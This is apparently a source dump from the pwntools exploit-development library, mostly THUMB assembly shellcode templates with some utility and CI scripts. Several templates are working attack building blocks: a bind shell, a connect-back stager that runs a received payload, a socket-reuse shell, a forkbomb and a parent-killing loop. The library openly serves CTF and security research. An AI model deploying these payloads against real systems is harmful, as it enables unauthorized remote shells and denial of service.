shellcodes. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/android: -------------------------------------------------------------------------------- 1 | linux -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/crash.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.thumb import mov %> 2 | <%docstring> 3 | Crash. 4 | 5 | Example: 6 | 7 | >>> run_assembly(shellcraft.crash()).poll(True) < 0 8 | True 9 | 10 | pop {r0-r12,lr} 11 | ldr sp, [sp, 64] 12 | pop {pc} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/freebsd/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing THUMB shellcodes for FreeBSD. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/infloop.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <%docstring>An infinite loop. 3 | <% infloop = common.label("infloop") %> 4 | ${infloop}: 5 | b ${infloop} 6 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing THUMB shellcodes for Linux. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/bindsh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.thumb.linux import listen, dupsh%> 2 | <%page args="port, network='ipv4'"/> 3 | <%docstring> 4 | bindsh(port,network) 5 | 6 | Listens on a TCP port and spawns a shell for the first to connect. 7 | Port is the TCP port to listen on, network is either 'ipv4' or 'ipv6'. 8 | 9 | ${listen(port, network)} 10 | ${dupsh()} 11 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/connectstager.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.thumb import linux %> 3 | <%docstring> 4 | connect recvsize stager 5 | Args: 6 | host, where to connect to 7 | port, which port to connect to 8 | network, ipv4 or ipv6? (default: ipv4) 9 | 10 | <%page args="host, port, network = 'ipv4'"/> 11 | 12 | ${linux.connect(host, port, network)} 13 | ${linux.recvsize('r6', 'r1')} 14 | ${linux.stager('r6', 'r1')} 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/dupio.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.thumb import mov %> 3 | <%page args="sock = 'r6'"/> 4 | <%docstring> 5 | Args: [sock (imm/reg) = r6] 6 | Duplicates sock to stdin, stdout and stderr 7 | 8 | <% 9 | looplabel = common.label("loop") 10 | %> 11 | /* dup() file descriptor ${sock} into stdin/stdout/stderr */ 12 | ${mov('r1', 2)} 13 | ${mov('r7', 'SYS_dup2')} 14 | 15 | ${looplabel}: 16 | ${mov('r0', sock)} 17 | svc 1 18 | subs r1, #1 19 | bpl ${looplabel} 20 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/dupsh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.thumb import linux %> 2 | <%page args="sock = 'r6'"/> 3 | <%docstring> 4 | Args: [sock (imm/reg) = r6] 5 | Duplicates sock to stdin, stdout and stderr and spawns a shell. 6 | 7 | 8 | 9 | ${linux.dupio(sock)} 10 | 11 | ${linux.sh()} 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/echo.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import thumb %> 2 | <%page args="string, sock = '1'"/> 3 | <%docstring> 4 | Writes a string to a file descriptor 5 | 6 | Example: 7 | 8 | >>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() 9 | b'hello\n' 10 | 11 | 12 | 13 | ${thumb.pushstr(string, append_null = False)} 14 | ${thumb.linux.syscall('SYS_write', sock, 'sp', len(string))} 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/findpeersh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.thumb.linux import findpeer, dupsh %> 2 | <%page args="port = None"/> 3 | <%docstring> 4 | findpeersh(port) 5 | 6 | Finds a connected socket. If port is specified it is checked 7 | against the peer port. A dup2 shell is spawned on it. 8 | 9 | ${findpeer(port)} 10 | ${dupsh()} 11 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/findpeerstager.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.thumb import linux %> 3 | <%docstring> 4 | Findpeer recvsize stager 5 | Args: 6 | port, the port given to findpeer (defaults to any) 7 | 8 | <%page args="port = None"/> 9 | 10 | ${linux.findpeer(port)} 11 | ${linux.recvsize('r6', 'r1')} 12 | ${linux.stager('r6', 'r1')} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/forkbomb.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.thumb.linux import fork 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Performs a forkbomb attack. 7 | 8 | <% 9 | dosloop = label('fork_bomb') 10 | %> 11 | ${dosloop}: 12 | ${fork()} 13 | b ${dosloop} 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/forkexit.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import common 3 | from pwnlib.shellcraft.thumb.linux import fork, exit 4 | %> 5 | <%page args=""/> 6 | <%docstring> 7 | Attempts to fork. If the fork is successful, the parent exits. 8 | 9 | <% 10 | dont_exit = common.label('forkexit') 11 | %> 12 | ${fork()} 13 | cmp r0, 1 14 | blt ${dont_exit} 15 | ${exit(0)} 16 | ${dont_exit}: 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/kill.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/kill.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/killparent.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.thumb.linux import getppid, kill 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Kills its parent process until whatever the parent is (probably init) 7 | cannot be killed any longer. 8 | 9 | <% 10 | killparent_loop = label('killparent') 11 | %> 12 | ${killparent_loop}: 13 | ${getppid()} 14 | ${kill('r0')} 15 | cmp r0,r0 16 | beq ${killparent_loop} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/readn.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.thumb.linux import read 3 | from pwnlib.shellcraft.thumb import setregs 4 | from pwnlib.shellcraft import common 5 | %> 6 | <%page args="fd, buf, nbytes"/> 7 | <%docstring> 8 | Reads exactly nbytes bytes from file descriptor fd into the buffer buf. 9 | 10 | Arguments: 11 | fd(int): fd 12 | buf(void): buf 13 | nbytes(size_t): nbytes 14 | 15 | <% 16 | readn_loop = common.label('readn_loop') 17 | %> 18 | ${setregs({'r3': buf, 'r4': nbytes})} 19 | ${readn_loop}: 20 | ${read(fd, 'r3', 'r4')} 21 | add r3, r3, r0 22 | subs r4, r4, r0 23 | bne ${readn_loop} 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/recvsize.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.thumb import linux %> 3 | <%docstring> 4 | Recives 4 bytes size field 5 | Useful in conjuncion with findpeer and stager 6 | Args: 7 | sock, the socket to read the payload from. 8 | reg, the place to put the size (default ecx). 9 | Leaves socket in ebx 10 | 11 | <%page args="sock, reg='r1'"/> 12 | <% 13 | recvsize = common.label("recvsize") 14 | %> 15 | ${recvsize}: 16 | ${linux.syscall('SYS_read', sock, 'sp', 4)} 17 | pop {${reg}} 18 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/setresuid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.thumb import mov, linux %> 3 | <%page args="ruid=None, euid=None, suid=None"/> 4 | <%docstring> 5 | Args: [ruid = geteuid(), euid = ruid, suid = ruid] 6 | Sets real, effective and saved user ids to given values 7 | 8 | 9 | %if ruid is None: 10 | ${linux.geteuid()} 11 | <% ruid = 'r0' %> 12 | %endif 13 | <% 14 | if euid is None: euid = ruid 15 | if suid is None: suid = ruid 16 | %> 17 | 18 | ${linux.syscalls.setresuid(ruid, euid, suid)} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/sh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import thumb %> 2 | <%docstring> 3 | Execute a different process. 4 | 5 | >>> p = run_assembly(shellcraft.thumb.linux.sh()) 6 | >>> p.sendline(b'echo Hello') 7 | >>> p.recv() 8 | b'Hello\n' 9 | 10 | 11 | ${thumb.linux.execve('/bin///sh', ['sh'], 0)} 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/sleep.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/sleep.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/linux/syscalls: -------------------------------------------------------------------------------- 1 | ../../common/linux/syscalls -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/memcpy.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import thumb, pretty, common %> 2 | <%docstring>Copies memory. 3 | 4 | Args: 5 | dest: Destination address 6 | src: Source address 7 | n: Number of bytes 8 | 9 | <%page args="dest, src, n"/> 10 | <% 11 | memcpy_loop = common.label("memcpy_loop") 12 | %> 13 | /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ 14 | ${thumb.setregs({'r4': dest, 'r1': src, 'r2': n})} 15 | ${memcpy_loop}: 16 | ldrb r3, [r1], #1 17 | strb r3, [r4], #1 18 | subs r2, r2, #1 19 | bgt ${memcpy_loop} 20 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/nop.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A nop instruction. 2 | mov r6, r6 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/popad.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring> 3 | Pop all of the registers onto the stack which i386 popad does, 4 | in the same order. 5 | 6 | pop {r0-r12} 7 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/pushad.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring> 3 | Push all of the registers onto the stack which i386 pushad does, 4 | in the same order. 5 | 6 | push {r0-r12} 7 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/ret.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import thumb %> 2 | <%docstring>A single-byte RET instruction. 3 | 4 | Args: 5 | return_value: Value to return 6 | 7 | <%page args="return_value = None"/> 8 | 9 | % if return_value is not None: 10 | ${thumb.mov('r0', return_value)} 11 | % endif 12 | 13 | bx lr 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/to_arm.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import thumb 3 | from random import choice 4 | from pwnlib.shellcraft import registers 5 | %> 6 | <%docstring>Go from THUMB to ARM mode. 7 | <%page args="reg=None, avoid = []"/> 8 | <% 9 | if reg: 10 | pass 11 | elif not avoid or 'r3' not in avoid: 12 | reg = 'r3' 13 | else: 14 | # Avoid registers we don't want to clobber, and r0 15 | # since it will encode a NULL. 16 | avoid = set(avoid) | {'r0', 'sp', 'pc', 'cpsr', 'lr'} 17 | reg = next(r for r in registers.arm if r not in avoid) 18 | %> 19 | .thumb 20 | add ${reg}, pc, #4 21 | bx ${reg} 22 | ${thumb.nop()} 23 | .arm 24 | 25 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/trap.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A trap instruction. 2 | BKPT 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/udiv_10.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import common 3 | from pwnlib.shellcraft import arm 4 | %> 5 | <%page args="N"/> 6 | <%docstring> 7 | Divides r0 by 10. Result is stored in r0, N and Z flags are updated. 8 | 9 | Code is from generated from here: 10 | https://raw.githubusercontent.com/rofirrim/raspberry-pi-assembler/master/chapter15/magic.py 11 | 12 | With code: 13 | python magic.py 10 code_for_unsigned 14 | 15 | /* r0 = ${N} / 10 */ 16 | ${arm.setregs({'r0': N, 'r1': 0xcccccccd})} 17 | umull r1, r2, r0, r1 /* r1 <- Lower32Bits(r1*r0). r2 <- Upper32Bits(r1*r0) */ 18 | movs r0, r2, LSR #3 /* r0 <- r2 >> 3 */ 19 | -------------------------------------------------------------------------------- /pwnlib/term/termcap.py: -------------------------------------------------------------------------------- 1 | __all__ = ['get'] 2 | import sys 3 | if sys.platform == 'win32': 4 | from pwnlib.term.windows_termcap import get 5 | else: 6 | from pwnlib.term.unix_termcap import get 7 | 8 | -------------------------------------------------------------------------------- /pwnlib/util/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | __all__ = [ 4 | 'crc', 'cyclic', 'fiddling', 'hashes', 'iters', 5 | 'lists', 'misc', 'net', 'packing', 'proc', 'safeeval', 6 | 'web' 7 | ] 8 | -------------------------------------------------------------------------------- /pwnlib/version.py: -------------------------------------------------------------------------------- 1 | __version__ = '5.0.0dev' 2 | -------------------------------------------------------------------------------- /travis/coverage_chdir.py: -------------------------------------------------------------------------------- 1 | import coverage 2 | import os 3 | import sys 4 | 5 | os.environ.setdefault("COVERAGE_PROCESS_START", ".coveragerc") 6 | coverage.process_startup() 7 | 8 | __file__ = os.path.abspath(sys.argv.pop(2)) 9 | with open(__file__) as fp: 10 | code = compile(fp.read(), __file__, 'exec') 11 | os.chdir(sys.argv.pop(1)) 12 | exec(code, globals()) 13 | -------------------------------------------------------------------------------- /travis/docker/.gitignore: -------------------------------------------------------------------------------- 1 | pwntools.tar.gz 2 | -------------------------------------------------------------------------------- /travis/docker/10-import.py: -------------------------------------------------------------------------------- 1 | try: 2 | from pwn import * 3 | except Exception: 4 | print("Could not import pwntools") 5 | import os, re, sys, time, random, urllib, datetime, itertools, subprocess, multiprocessing 6 | -------------------------------------------------------------------------------- /travis/docker/run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # We have to explicitly start the ssh service 4 | sudo service ssh start 5 | 6 | # Enable the IPv6 interface 7 | echo 0 | sudo tee /proc/sys/net/ipv6/conf/all/disable_ipv6 8 | 9 | PWNLIB_NOTERM=1 coverage3 run -m sphinx -b doctest docs/source docs/build/doctest $TARGET 10 | -------------------------------------------------------------------------------- /travis/docker/tmux.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env zsh 2 | exec tmux -u -2 3 | --------------------------------------------------------------------------------